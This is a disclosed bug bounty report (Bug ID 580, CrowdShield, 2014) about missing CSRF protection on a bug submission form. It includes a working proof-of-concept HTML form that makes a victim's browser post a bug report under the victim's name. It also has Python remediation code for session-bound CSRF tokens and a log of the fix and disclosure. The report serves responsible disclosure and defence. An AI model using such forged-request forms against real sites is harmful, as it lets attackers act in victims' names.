
Cross Site Request Forgery

Severity: Medium
Bug ID: 580
Researcher: sandeepv
Status: Disclosed
Submitted: 11/30/2014

Description:

CSRF protection is not implemented on the new bug report form. An attacker can therefore send a CSRF link to a victim, and the victim's browser will post a bug on the victim's behalf. Here the attacker can write any abuse about the program in the victim's name, reducing the tester's reputation.

Affected URL:

http://crowdshield.com/report_bug_new.php

Affected Params:

Bug submission

Bug Evidence:

<html>
  <body>
    <form action="http://crowdshield.com/report_bug_new.php" method="POST">
      <input type="hidden" name="affected_url" value="sdf" />
      <input type="hidden" name="affected_params" value="dsf" />
      <input type="hidden" name="bug_description" value="dsfdsfffffffffffffffffffffffffffffffffffffffffffffdvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv                             sdggggggggggggggg" />
      <input type="hidden" name="bug_evidence" value="dsf        wertwetrwt" />
      <input type="hidden" name="bug_recommendation" value="dsf      ewrtretret" />
      <input type="hidden" name="bug_category" value="Cross&#32;Site&#32;Scripting" />
      <input type="hidden" name="submit_bug" value="Submit&#32;Bug" />
      <input type="hidden" name="bounty_id" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Bug Recommendation:

Implement CSRF tokens in both the cookie and the POST request, and check that they match on the server. This restricts some token bypasses.
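As an added illustration of that recommendation (example code, not CrowdShield's PHP), the check below binds the token to the session with a server-side HMAC in addition to comparing the cookie copy against the form copy, so a form like the evidence above (no token) and a request that simply places the same self-chosen value in both the cookie and the body are both rejected. The session cookie name PHPSESSID, the secret, and the request contents are assumptions constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret for this example; a real deployment loads it from config.
SERVER_SECRET = b"example-only-secret"
# Fields posted by the report_bug_new.php form (names taken from the evidence above).
REQUIRED_FIELDS = ("affected_url", "affected_params", "bug_description", "bug_evidence",
                   "bug_recommendation", "bug_category", "bounty_id")

def issue_csrf_token(session_id):
    """Mint <nonce>.<HMAC(secret, session_id|nonce)>; set it as a cookie and a hidden field."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}|{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def token_bound_to_session(session_id, token):
    """True only if this server minted the token for this session (defeats self-chosen tokens)."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}|{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)

def validate_bug_submission(cookies, form):
    """Decide whether a POST to report_bug_new.php may create a bug (PHPSESSID name assumed)."""
    session_id, cookie_token, form_token = (
        cookies.get("PHPSESSID"), cookies.get("csrf_token"), form.get("csrf_token"))
    if not session_id or not cookie_token or not form_token:
        return False, "missing session or csrf token"   # the evidence form above lands here
    if not hmac.compare_digest(cookie_token, form_token):
        return False, "cookie and form token differ"
    if not token_bound_to_session(session_id, form_token):
        return False, "token not issued by server for this session"
    if any(field not in form for field in REQUIRED_FIELDS):
        return False, "incomplete submission"
    return True, "accepted"

def demo():
    """Constructed requests: the evidence form (no token), a self-chosen token, a minted one."""
    sid = "constructed-session-id"
    base = {field: "x" for field in REQUIRED_FIELDS}      # same field names as the evidence
    minted = issue_csrf_token(sid)
    return {
        "no_token": validate_bug_submission({"PHPSESSID": sid}, base),
        "self_chosen": validate_bug_submission({"PHPSESSID": sid, "csrf_token": "abc.def"},
                                               {**base, "csrf_token": "abc.def"}),
        "minted": validate_bug_submission({"PHPSESSID": sid, "csrf_token": minted},
                                          {**base, "csrf_token": minted}),
    }
```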

Direct Chat

sandeepv 11/30/2014
submitted a Cross Site Request Forgery bug to CrowdShield
CrowdShield 12/01/2014
Acknowledged bug ID: 580 - Cross Site Request Forgery submitted by sandeepv and awarded 15 points!
CrowdShield 12/08/2014
Fixed bug ID: 580 - Cross Site Request Forgery submitted by sandeepv
CrowdShield 06/24/2015
disclosed a Cross Site Request Forgery bug submitted by sandeepv
